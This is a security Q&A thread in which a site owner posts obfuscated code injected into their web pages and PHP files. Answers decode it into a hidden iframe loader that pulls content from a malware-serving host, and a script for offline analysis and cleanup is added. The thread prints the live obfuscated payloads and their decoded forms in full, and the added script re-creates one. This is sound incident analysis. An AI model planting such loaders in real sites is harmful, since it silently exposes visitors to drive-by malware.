11

One of my sites has just been hacked as this code has been inserted into random(?) files and places within the files.

Does anyone understand what it is trying to do? I would welcome anything that may assist me with finding out how it got on.

Also, any suggestions on how to stop it re-appearing? Every time I delete it, it just comes back a short while later.

<!--0242d5--><script type="text/javascript" language="javascript" >                                                                                                                                                                                                                                                          p=parseInt;ss=(123)?String.fromCharCode:0;asgq="28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!70!7a!74!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!70!7a!74!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!77!77!77!2e!62!65!74!74!65!72!62!61!6@!6c!62!6f!6e!64!73!2e!6e!65!74!2f!56!4c!4e!53!65!63!30!31!2f!63!6e!74!2e!70!68!70!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!70!7a!74!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!70!7a!74!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!70!7a!74!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!70!7a!74!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!70!7a!74!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b".replace(/@/g,"9").split("!");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=62;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s="";if(zz)for(i=0;i-485!=0;i++){if(window.document)s
+=ss(p(asgq[i],16));}if(window.document)e(s);}}</script><!--/0242d5-->
----


CODE in various places and end of files
----

<?
#0242d5#
                                                                                                                                                                                                                                                          eval(gzinflate(base64_decode("5VbBcpswEL33KywOHRinNiCQnBJSz+TUc46lBwwC03EMRcRp7PG/d3eFk+Bx2k6SnuLRjKWn3bdvV1rZKlvWI2v0bj8XOmurpht1942KE6tTv7rpj3STGjixRqt0Xd6mJW4O8Mv3W7MmbtJWq6/rLtI6tj2fO1+uu7Zal5OirW+ulml7VefqsxuluvwJhfNnTAgmQyYUE5zJgIk5EwUufZfBrj/HiVywnKUEHYYUTHhM+jgHHwlEPjlLRHhOeEBcnALkTFAYiOGbYD4hHkUNWQDzjJCnlqBAEq0ge6/fBRCUcSPrWNqxHGAy0fijNGSdYQQcAAJDgUPKfqBGEmhscOIT4hFtRnMqFGQJ/GivenvgCQULMhYoFnLKhjMOUTzcgvlDGSA0yiA9fPGPmUC8eV+rnqJAHI2H5/eYqockaFOgowz7lF4e1WSPJTnU5mk8/pqEoCBYMTIwZzSg9jBjOXtNxcyNMuc6e2v2/hKL/yGc+km6f+M9wQ16+ob2/tiWsr/CJ7sx8FFOQLV76MyBamrLZ9+MgabnRWAD+ofrHPaReEYuc3x4+pQCLEKYndBhQK7QCzvu4AjI4OV4gbi3qZCid8+l5g37RyTgdPXNeZP7se9J3TInCL6QeGasEmvSqmaVZsqezqflWWKdJ5Yz0c2q6uzEYrCIuvZ+l9fZ7Y1ad5NFnd9/jN2Jt8/SLlvaZa5LnZfObruNeZQv9LJVseeLqCpss3J2m2Jzp2J3QBT1/ikSHEy8aA9ujBbOTsVqk66ivYbfn8RCwu3WKerWroCr+hS65wwn47Gzg727ap3Xd5MDv6PHsdZ2Y+MP2Lfq+5knHIfojw2VrWFjfzE1fwwuP1jRbw==")));

#/0242d5#

?>

--

(Within the above tags [#0242d5# and #/0242d5#] is this code, which won't show properly when just pasted here.)

eval(gzinflate(base64_decode("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")));

Gilles 'SO- stop being evil'
Keith B

2 Answers

23

The first code block (in bold) actually decodes to this (decoded with deobfuscatejavascript.com):

(function() {
    var pzt = document.createElement('iframe');

    pzt.src = 'http://www.betterbailbonds.net/VLNSec01/cnt.php';
    pzt.style.position = 'absolute';
    pzt.style.border = '0';
    pzt.style.height = '1px';
    pzt.style.width = '1px';
    pzt.style.left = '1px';
    pzt.style.top = '1px';

    if (!document.getElementById('pzt')) {
        document.write('<div id=\'pzt\'></div>');
        document.getElementById('pzt').appendChild(pzt);
    } })();

Yes. This stuff does look malicious. It appears to be including files from another (probably also hacked) server in order to do -something-. The reason the code looks like this is because someone has attempted to obfuscate the code using some tools. Luckily it's reversible.

The code above is basically creating an 'invisible' iframe in the page and loading the URL from betterbailbonds.net.

Kaspersky Internet Security flags it as a malware-serving site.

The second chunk of code is base64-encoded and gzinflated; decoded with this tool:

echo "

p=parseInt;ss=(123)?String.fromCharCode:0;asgq=\"28!66!75!6e!63!74!6@!6f!6e!20!28!2@!20!7b!d!a!20!20!20!20!76!61!72!20!6@!78!62!6@!67!20!3d!20!64!6f!63!75!6d!65!6e!74!2e!63!72!65!61!74!65!45!6c!65!6d!65!6e!74!28!27!6@!66!72!61!6d!65!27!2@!3b!d!a!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!72!63!20!3d!20!27!68!74!74!70!3a!2f!2f!77!77!77!2e!62!65!74!74!65!72!62!61!6@!6c!62!6f!6e!64!73!2e!6e!65!74!2f!56!4c!4e!53!65!63!30!31!2f!63!6e!74!2e!70!68!70!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!70!6f!73!6@!74!6@!6f!6e!20!3d!20!27!61!62!73!6f!6c!75!74!65!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!62!6f!72!64!65!72!20!3d!20!27!30!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!68!65!6@!67!68!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!77!6@!64!74!68!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!6c!65!66!74!20!3d!20!27!31!70!78!27!3b!d!a!20!20!20!20!6@!78!62!6@!67!2e!73!74!7@!6c!65!2e!74!6f!70!20!3d!20!27!31!70!78!27!3b!d!a!d!a!20!20!20!20!6@!66!20!28!21!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!6@!78!62!6@!67!27!2@!2@!20!7b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!77!72!6@!74!65!28!27!3c!64!6@!76!20!6@!64!3d!5c!27!6@!78!62!6@!67!5c!27!3e!3c!2f!64!6@!76!3e!27!2@!3b!d!a!20!20!20!20!20!20!20!20!64!6f!63!75!6d!65!6e!74!2e!67!65!74!45!6c!65!6d!65!6e!74!42!7@!4@!64!28!27!6@!78!62!6@!67!27!2@!2e!61!70!70!65!6e!64!43!68!6@!6c!64!28!6@!78!62!6@!67!2@!3b!d!a!20!20!20!20!7d!d!a!7d!2@!28!2@!3b\".replace(/@/g,\"9\").split(\"!\");try{document.body&=0.1}catch(gdsgsdg){zz=3;dbshre=126;if(dbshre){vfvwe=0;try{document;}catch(agdsg){vfvwe=1;}if(!vfvwe){e=eval;}s=\"\";if(zz)for(i=0;i-509!=0;i++){if(window.document)s+=ss(p(asgq[i],16));}if(window.document)e(s);}}";

The above code then deobfuscates again (I had to do it manually this time because the online one threw errors??) into something similar but with different variable names:

(function () {
    var ixbig = document.createElement('iframe');

    ixbig.src = 'http://www.betterbailbonds.net/VLNSec01/cnt.php';
    ixbig.style.position = 'absolute';
    ixbig.style.border = '0';
    ixbig.style.height = '1px';
    ixbig.style.width = '1px';
    ixbig.style.left = '1px';
    ixbig.style.top = '1px';

    if (!document.getElementById('ixbig')) {
        document.write('<div id=\'ixbig\'></div>');
        document.getElementById('ixbig').appendChild(ixbig);
    }
})();

A quick Google search shows that it appears you've been part of a wider attack, with many people having similar code embedded in their pages. This also appears to be a duplicate of this stackexchange post.

Edit:

I've just noticed that accessing this page flags it as malware via Kaspersky Internet Security. It's obviously aware of the script and defines it as HEUR:Trojan.Script.Generic.

NULLZ
  • Hi @adnan, thanks for the prompt response and explanation. Any idea what vulnerability let it in? Google reckons it's a trojan, and I thought as it was JS it may be XSS? However, the theory is OK, but actually finding the weakness in older code is not too obvious!! Sorry, but I did try Google first and did not find the answers you did; probably looking for the wrong keywords! – Keith B Apr 03 '13 at 08:06
  • 1
    @KeithB we can't tell you that from looking at the injected code. You'd need to perform a review of your environment. I recall hearing something earlier today about a recent spate of Apache attacks, however, so that might be worth checking. – NULLZ Apr 03 '13 at 08:18
  • @D3C4FF: ups for a great response. – grauwulf Apr 05 '13 at 16:34
5

Locally done

This could be done easily with standard stuff:

One of the advantages is that it could be done offline, as @D3C4FF commented.

.0 Preamble

Warning: execution of bad code may be harmful, so using a special user account with no rights on your host and personal stuff is strongly recommended!

There is a kind of temporary trick I use:

#!/bin/bash
# Create a throwaway account with no password, work inside it interactively,
# then remove it (home directory included) only if nothing is still running as it.
adduser --disabled-password se-33671 </dev/null
su - se-33671 -c 'bash -i'
ps --user se-33671 feww && \
    echo WARNING: Something remains || \
    deluser --remove-home se-33671 </dev/null

.1 First step

Simply change eval to print and enclose it in PHP tags:

echo '<?php print(gzinflate(base64_decode("5VbBcpsw...jRbw==")));?>' |
    php > suspect.html

Now we can see the JavaScript in suspect.html.

This step is normally done by the server, which sends the HTML result to the client.

.2 Second step

For this, I use the SpiderMonkey command-line JavaScript interpreter.

There is no window object, so the code has to be modified:

replacing every eval with print, so the code is printed instead of executed,

replacing every window.document with 1 to satisfy the conditions,

and stripping tags and escapes:

sed -ne 's/<[^>]*>//g;
    s/^echo." *//;
    s/\\"/"/g;
    s/eval/print/;
    s/)e(/)print(/;
    s/window.document/1/g;
    /parse/p' suspect.html |
  smjs

This will dump the polluting inclusion to the console:

(function () {
    var ixbig = document.createElement('iframe');

    ixbig.src = 'http://www.betterbailbonds.net/VLNSec01/cnt.php';
    ixbig.style.position = 'absolute';
    ixbig.style.border = '0';
    ixbig.style.height = '1px';
    ixbig.style.width = '1px';
    ixbig.style.left = '1px';
    ixbig.style.top = '1px';

    if (!document.getElementById('ixbig')) {
        document.write('<div id=\'ixbig\'></div>');
        document.getElementById('ixbig').appendChild(ixbig);
    }
})();

This works fine for the current sample, but has to be adapted for each case.

Generally, the simplest way to wipe obfuscation out is to partially execute the stuff, but take care!

  • Thanks for the explanation. I have found one of my hosters uses suPHP, so I am removing write access from most files, i.e. 644 to 444 and .php to 400, as I have seen this recommended. Is this usually done on web servers, and will it deter many/any of these code injection attacks?? – Keith B Apr 04 '13 at 13:54
  • Hum, warning: this is another question! The answer could not be simply `yes, but...` – F. Hauri - Give Up GitHub Apr 04 '13 at 22:12
  • I think it'd be better to do offline static analysis of the files. Download them to your desktop and decode as per above rather than to execute the code and risk your controls being compromised. – NULLZ Apr 05 '13 at 06:52
  • @D3C4FF Yes, of course as there is no external requirement, all this would be better done offline. (In fact the host I use to do this is not configured with a default route) – F. Hauri - Give Up GitHub Apr 05 '13 at 14:01
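Added example (not code from the question or from either answer): a fully offline, eval-free Python triage script that performs both decoding stages the two answers walk through, the '!'-separated hex JavaScript stage that NULLZ decoded with an online tool and the eval(gzinflate(base64_decode(...))) PHP stage that F. Hauri decoded with php and smjs, and that also strips the marker-delimited blocks so a site can be cleaned without executing any of the payload. The sample payload is constructed inside the script by mirroring the scheme of the posted sample (same hex/'!'/@ encoding, same wrapper markers, same iframe URL); the assumption that the wrapper is always a six-hex-digit id, the regexes, and the function names are mine, not something the page confirms.

```python
import base64
import re
import zlib

# Six-hex-digit marker the injector wraps its payload in. The value comes from the
# posted sample; treating it as a generic six-hex-digit pattern is an assumption.
MARKER = "0242d5"

# eval(gzinflate(base64_decode("..."))) as seen in the infected PHP files.
PHP_EVAL_RE = re.compile(r'eval\(gzinflate\(base64_decode\("([A-Za-z0-9+/=]+)"\)\)\)')

# The '!'-separated hex literal (with 9 written as @) that the JavaScript stage
# feeds to parseInt(x, 16) / String.fromCharCode. The optional backslashes accept
# the \"...\" form that appears inside the PHP echo string.
HEX_LITERAL_RE = re.compile(r'=\s*\\?"((?:[0-9a-f@]{1,2}!)+[0-9a-f@]{1,2})\\?"', re.I)

# The iframe source assigned in the fully decoded JavaScript.
IFRAME_SRC_RE = re.compile(r"""\.src\s*=\s*['"]([^'"]+)['"]""")

# Both wrapper styles seen on the page: <!--id-->...<!--/id--> and #id#...#/id#.
MARKED_BLOCK_RE = re.compile(
    r"<!--([0-9a-f]{6})-->.*?<!--/\1-->"
    r"|#([0-9a-f]{6})#.*?#/\2#",
    re.S,
)


def decode_php_stage(php_source: str) -> str:
    """Undo eval(gzinflate(base64_decode(...))) without running PHP."""
    m = PHP_EVAL_RE.search(php_source)
    if not m:
        raise ValueError("no eval(gzinflate(base64_decode(...))) found")
    raw = base64.b64decode(m.group(1))
    # PHP gzinflate() is raw DEFLATE (no zlib/gzip header), hence negative wbits.
    return zlib.decompress(raw, -zlib.MAX_WBITS).decode("latin-1")


def decode_hex_stage(js_source: str) -> str:
    """Mirror .replace(/@/g,"9").split("!") + parseInt(x,16) + fromCharCode, no eval."""
    m = HEX_LITERAL_RE.search(js_source)
    if not m:
        raise ValueError("no '!'-separated hex literal found")
    tokens = m.group(1).replace("@", "9").split("!")
    return "".join(chr(int(tok, 16)) for tok in tokens)


def triage(text: str) -> list:
    """Peel whatever stages are present and return the iframe URLs found."""
    if PHP_EVAL_RE.search(text):
        text = decode_php_stage(text)     # PHP -> emitted HTML/JavaScript
    if HEX_LITERAL_RE.search(text):
        text = decode_hex_stage(text)     # hex-encoded JavaScript -> plain JavaScript
    return IFRAME_SRC_RE.findall(text)


def strip_marked_blocks(text: str) -> str:
    """Remove every marker-delimited block (the part that keeps reappearing)."""
    return MARKED_BLOCK_RE.sub("", text)


# ---- constructed sample payload, built the same way the posted one is built ------

def _obfuscate_hex(js: str) -> str:
    """Constructed encoder mirroring the sample's scheme (hex, '!'-joined, 9 -> @)."""
    return "!".join(format(ord(c), "x") for c in js).replace("9", "@")


PLAIN_JS = ("(function(){var pzt=document.createElement('iframe');"
            "pzt.src='http://www.betterbailbonds.net/VLNSec01/cnt.php';"
            "document.body.appendChild(pzt);})();")

STAGE2_JS = ('p=parseInt;ss=String.fromCharCode;asgq="' + _obfuscate_hex(PLAIN_JS)
             + '".replace(/@/g,"9").split("!");s="";'
             'for(i=0;i<asgq.length;i++)s+=ss(p(asgq[i],16));eval(s);')

HTML_SAMPLE = (f'<!--{MARKER}--><script type="text/javascript">{STAGE2_JS}</script>'
               f'<!--/{MARKER}-->')


def _build_php_sample() -> str:
    """Constructed: wrap HTML_SAMPLE in echo, raw-deflate it, base64 it, eval it."""
    php_body = 'echo "' + HTML_SAMPLE.replace('"', '\\"') + '";'
    comp = zlib.compressobj(9, zlib.DEFLATED, -zlib.MAX_WBITS)
    deflated = comp.compress(php_body.encode("latin-1")) + comp.flush()
    b64 = base64.b64encode(deflated).decode("ascii")
    return f'<?\n#{MARKER}#\neval(gzinflate(base64_decode("{b64}")));\n#/{MARKER}#\n?>'


PHP_SAMPLE = _build_php_sample()

if __name__ == "__main__":
    for name, sample in (("html", HTML_SAMPLE), ("php", PHP_SAMPLE)):
        print(name, "->", triage(sample))
    print(repr(strip_marked_blocks(PHP_SAMPLE)))
```

Run it on a copy of an infected file (never on the live web root, and from a throwaway account as the preamble above recommends) by passing the file's text to `triage()` to get the contact URL for blocking and to `strip_marked_blocks()` to get the cleaned content. Because nothing here calls eval, php or smjs, the payload cannot run during analysis; the trade-off is that the regexes are tied to this family's encoding and will need the same per-case adaptation the second answer mentions for its sed script.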